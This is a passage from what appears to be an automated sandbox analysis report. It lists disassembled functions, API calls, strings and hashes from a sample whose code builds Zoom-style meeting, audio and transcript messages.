                • __EH_prolog3.LIBCMT ref: 00C686C7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyConfStatus,0000271B,MeetingID,MeetingNumber,status,FailoverReason,00000004), ref: 00C686EF
                  • Part of subcall function 00C86120: __EH_prolog3.LIBCMT ref: 00C86127
                  • Part of subcall function 00C86120: ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C686F4,com.Zoom.app.conf.notifyConfStatus,0000271B,MeetingID,MeetingNumber,status,FailoverReason,00000004), ref: 00C86140
                  • Part of subcall function 00C8635D: __EH_prolog3_GS.LIBCMT ref: 00C86364
                  • Part of subcall function 00C8635D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6871B), ref: 00C86378
                  • Part of subcall function 00C8635D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,00000044,00C6871B), ref: 00C863AA
                  • Part of subcall function 00C8635D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C863E7
                  • Part of subcall function 00C8635D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,?,-00000004), ref: 00C86419
                  • Part of subcall function 00C8635D: EnterCriticalSection.KERNEL32(00C6871B), ref: 00C8649B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$Cmm@@_H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: FailoverReason$MeetingID$MeetingNumber$com.Zoom.app.conf.notifyConfStatus$status
                • API String ID: 3905976763-451630439
                • Opcode ID: b395dc0d0ea1501f7b2a2553b7500c93ee9ee1397219c7977467650cdcbd4b5c
                • Instruction ID: 3417a7bed7ff580d2413bf17c8f0a5d430b77094872f6ce1d2d1d1e98ba2ac68
                • Opcode Fuzzy Hash: b395dc0d0ea1501f7b2a2553b7500c93ee9ee1397219c7977467650cdcbd4b5c
                • Instruction Fuzzy Hash: 65E0D8B0B40B50EBD710BF54BC0BB5C76A06B00F19F840A38B1549A3D6CBF00608D779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CA77
                • ??0?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type,key,bytes_value,action,00000004), ref: 00C6CA9F
                  • Part of subcall function 00C8C8C0: __EH_prolog3.LIBCMT ref: 00C8C8C7
                  • Part of subcall function 00C8C8C0: ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C6CAA4,com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type,key,bytes_value,action,00000004), ref: 00C8C8E0
                  • Part of subcall function 00C8CA60: __EH_prolog3_GS.LIBCMT ref: 00C8CA67
                  • Part of subcall function 00C8CA60: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CACB), ref: 00C8CA7B
                  • Part of subcall function 00C8CA60: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,00000044,00C6CACB), ref: 00C8CAAD
                  • Part of subcall function 00C8CA60: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8CAEA
                  • Part of subcall function 00C8CA60: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,?,-00000004), ref: 00C8CB1C
                  • Part of subcall function 00C8CA60: EnterCriticalSection.KERNEL32(00C6CACB), ref: 00C8CB9E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@V12@@
                • String ID: action$bytes_value$com.Zoom.app.meeting.cache.bytes.kv.op$data_type$key
                • API String ID: 3479804182-3532546848
                • Opcode ID: a639d2da9ea85500a5631a05bb09040fd097a4aa1d126875327b64b184edb8ac
                • Instruction ID: 81d28466491f485689ac31d8978414d7421fec0b9d5d06de5701580d6b3f4f71
                • Opcode Fuzzy Hash: a639d2da9ea85500a5631a05bb09040fd097a4aa1d126875327b64b184edb8ac
                • Instruction Fuzzy Hash: 6FE0D1717C0354BAD710B7649C87B6D7250A710F19F554618B1401A2C1CFF44A48D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70B47
                • ??0?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.audio.facility,00002753,FromApp,AudioDevType,OperateType,NeedUserConfirm,00000004), ref: 00C70B6F
                  • Part of subcall function 00C913C0: __EH_prolog3.LIBCMT ref: 00C913C7
                  • Part of subcall function 00C913C0: ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C70B74,com.Zoom.app.conf.operate.audio.facility,00002753,FromApp,AudioDevType,OperateType,NeedUserConfirm,00000004), ref: 00C913E0
                  • Part of subcall function 00C91470: __EH_prolog3_GS.LIBCMT ref: 00C91477
                  • Part of subcall function 00C91470: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70B9B), ref: 00C9148B
                  • Part of subcall function 00C91470: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.operate.audio.facility,00000044,00C70B9B), ref: 00C914BD
                  • Part of subcall function 00C91470: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C914FA
                  • Part of subcall function 00C91470: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.operate.audio.facility,?,-00000004), ref: 00C9152C
                  • Part of subcall function 00C91470: EnterCriticalSection.KERNEL32(00C70B9B), ref: 00C915AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@Tree
                • String ID: AudioDevType$FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.audio.facility
                • API String ID: 1561877593-1063733632
                • Opcode ID: 3ea9692454f6fa5795041349d20f27ca0d26f38ffd486bfb98781d5a5527dc69
                • Instruction ID: bf4aed40e929c4feb10d3d74fb384f407e1d351d41aa7d4011da24487fe33880
                • Opcode Fuzzy Hash: 3ea9692454f6fa5795041349d20f27ca0d26f38ffd486bfb98781d5a5527dc69
                • Instruction Fuzzy Hash: 85E068B0A80391BFCB00FB649C0B71D76A0A700F8DF00C628B6853A2D1CBF04608D771
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72CA7
                • ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00009E95,nSpokenLangId,strSpokenLangName,nTranscriptLangId,strTranscriptLangName,00000004), ref: 00C72CCF
                  • Part of subcall function 00C92D60: __EH_prolog3.LIBCMT ref: 00C92D67
                  • Part of subcall function 00C92D60: ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C72CD4,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00009E95,nSpokenLangId,strSpokenLangName,nTranscriptLangId,strTranscriptLangName,00000004), ref: 00C92D80
                  • Part of subcall function 00C92F20: __EH_prolog3_GS.LIBCMT ref: 00C92F27
                  • Part of subcall function 00C92F20: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C72CFB), ref: 00C92F3B
                  • Part of subcall function 00C92F20: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,00000044,00C72CFB), ref: 00C92F6D
                  • Part of subcall function 00C92F20: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C92FAA
                  • Part of subcall function 00C92F20: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify,?,-00000004), ref: 00C92FDC
                  • Part of subcall function 00C92F20: EnterCriticalSection.KERNEL32(00C72CFB), ref: 00C9305E
                Strings
                • nTranscriptLangId, xrefs: 00C72CB6
                • strSpokenLangName, xrefs: 00C72CBB
                • nSpokenLangId, xrefs: 00C72CC0
                • com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify, xrefs: 00C72CCA
                • strTranscriptLangName, xrefs: 00C72CB1
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: com.zoom.app.cci.ccivideo.onlivetranscriptmsgerror.notify$nSpokenLangId$nTranscriptLangId$strSpokenLangName$strTranscriptLangName
                • API String ID: 2908724648-2456917703
                • Opcode ID: 2fb4bf1ff77a8eb8f6798aa1ccc1ce63985fc8a6f05b397906a953b009933d39
                • Instruction ID: ac4bf8352a2e118588783c5fe0a8f04568ee623ea8a02b32b965bc323ee24810
                • Opcode Fuzzy Hash: 2fb4bf1ff77a8eb8f6798aa1ccc1ce63985fc8a6f05b397906a953b009933d39
                • Instruction Fuzzy Hash: 9DE09BB2641350BADB117B58C80771F2650A710F15F40C068B1442E3C1CBF5460CD675
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EC27
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00009DD9,deviceID,deviceType,result,channelName,00000004), ref: 00C6EC4F
                  • Part of subcall function 00C8E900: __EH_prolog3.LIBCMT ref: 00C8E907
                  • Part of subcall function 00C8E900: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7B838,?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request), ref: 00C8E920
                  • Part of subcall function 00C8EDD4: __EH_prolog3_GS.LIBCMT ref: 00C8EDDB
                  • Part of subcall function 00C8EDD4: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EC7B), ref: 00C8EDEF
                  • Part of subcall function 00C8EDD4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00000044,00C6EC7B), ref: 00C8EE21
                  • Part of subcall function 00C8EDD4: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8EE5E
                  • Part of subcall function 00C8EDD4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,?,-00000004), ref: 00C8EE90
                  • Part of subcall function 00C8EDD4: EnterCriticalSection.KERNEL32(00C6EC7B), ref: 00C8EF12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response$deviceID$deviceType$result
                • API String ID: 2908724648-140503531
                • Opcode ID: d7e1f705596dade7f758e51ef0f9a093323993c30d6dd417bb190d22e735d728
                • Instruction ID: 9700dfaac74462f8ada65b368ed2af8c473325cc1d29f8a52d373102460996b3
                • Opcode Fuzzy Hash: d7e1f705596dade7f758e51ef0f9a093323993c30d6dd417bb190d22e735d728
                • Instruction Fuzzy Hash: EFE092B06407D4BFDB10BF59C80B75D2660A700B95F418969B2001A2D2CFF14508D779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70EB7
                • ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(com.zoom.app.assistant.update.register.server.request,00009CE7,LineCallId,Registrar,ProxyServer,Protocol,00000004), ref: 00C70EDF
                  • Part of subcall function 00C8E6B0: __EH_prolog3.LIBCMT ref: 00C8E6B7
                  • Part of subcall function 00C8E6B0: ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(?,?,?,?,?,00000004,00C7B908,?,?,?,?,?,?,00000004,00C6E709,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E6D0
                  • Part of subcall function 00C91770: __EH_prolog3_GS.LIBCMT ref: 00C91777
                  • Part of subcall function 00C91770: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70F0B), ref: 00C9178B
                  • Part of subcall function 00C91770: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.update.register.server.request,00000044,00C70F0B), ref: 00C917BD
                  • Part of subcall function 00C91770: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C917FA
                  • Part of subcall function 00C91770: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.update.register.server.request,?,-00000004), ref: 00C9182C
                  • Part of subcall function 00C91770: EnterCriticalSection.KERNEL32(00C70F0B), ref: 00C918AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$CriticalEnterH0000@H000@H_prolog3_Node@23@Root@SectionTemplate_3@Template_4@TreeV12@@
                • String ID: LineCallId$Protocol$ProxyServer$Registrar$com.zoom.app.assistant.update.register.server.request
                • API String ID: 2901042537-1147628736
                • Opcode ID: 1d034c30862a4b5d252a2f02a23c7da1403dc1f1ed103fe8754fe5ee5a24c6e2
                • Instruction ID: 18462dbd684a0155ae3b8d6d546fa8a7daffa9c9ed47f9e7b3f2019877cc207d
                • Opcode Fuzzy Hash: 1d034c30862a4b5d252a2f02a23c7da1403dc1f1ed103fe8754fe5ee5a24c6e2
                • Instruction Fuzzy Hash: 18E09271A80395BEDB10BB948C07B6D6AA0AB10F59F518128B1507B2D2CBF44548D775
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E509
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C8E541
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID), ref: 00C8E56F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID), ref: 00C8E5AC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type), ref: 00C8E5DC
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request), ref: 00C8E664
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value), ref: 00C8E681
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID), ref: 00C8E694
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 817aa354aeb71b29448d0198c88bc605de4462e8c043d620487c5cfec86d5045
                • Instruction ID: 0f1bc79f72e89cb9578069deef82a613f56aa59d8baad57d1b7a4fd261d404e9
                • Opcode Fuzzy Hash: 817aa354aeb71b29448d0198c88bc605de4462e8c043d620487c5cfec86d5045
                • Instruction Fuzzy Hash: 5B519D74E003289FCF14EFA4C9456DDBBB5AF59315F004119EC12AB391EB309A4ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92BC7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92BF9
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94), ref: 00C92D0E
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify), ref: 00C92D2B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName), ref: 00C92D3E
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 1a5b9a668f464e888585f7b4883aa56a02964675fc8934087e1f5016bd9aa28b
                • Instruction ID: e9872fe0860b732ee239eeec6f53e5f57e21d848a360ee116c240379a50dc2b6
                • Opcode Fuzzy Hash: 1a5b9a668f464e888585f7b4883aa56a02964675fc8934087e1f5016bd9aa28b
                • Instruction Fuzzy Hash: 0D41AE75E003199FCF14EFA4C8496DDBBB0BF49315F004118EC12AB391DB309A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A2E8
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A314
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A342
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A37F
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData), ref: 00C8A3AF
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url), ref: 00C8A41B
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748), ref: 00C8A438
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A44B
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 850266bdb2f241239a1e0012e2248ed58b558a1910da0c4c00f789c205cb1db6
                • Instruction ID: af5352021dbd735688d21fd341dece16e7d2db805d96019ec95e1c54982a3a03
                • Opcode Fuzzy Hash: 850266bdb2f241239a1e0012e2248ed58b558a1910da0c4c00f789c205cb1db6
                • Instruction Fuzzy Hash: 2F41B174D017189FCF14EFA4D8496DDBBB4AF48315F004119EC12AB391DB70AA4ADFAA
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8ACA4
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8ACD0
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8ACFE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8AD3B
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id), ref: 00C8AD6B
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type), ref: 00C8ADD7
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2), ref: 00C8ADF4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8AE07
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 6056aa6dc357765cf093a4cad35c615f998e13e542150dc8a01633ff9cdf1536
                • Instruction ID: 207dfa98f6dfb512bf6e831b5e0248ce0f6bd129dc94bce49c1c8aacbb06a918
                • Opcode Fuzzy Hash: 6056aa6dc357765cf093a4cad35c615f998e13e542150dc8a01633ff9cdf1536
                • Instruction Fuzzy Hash: F7419075D002199FCF14EFA4C8456DEBBB4AF08315F04411AEC12AB391DF709A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EC5D
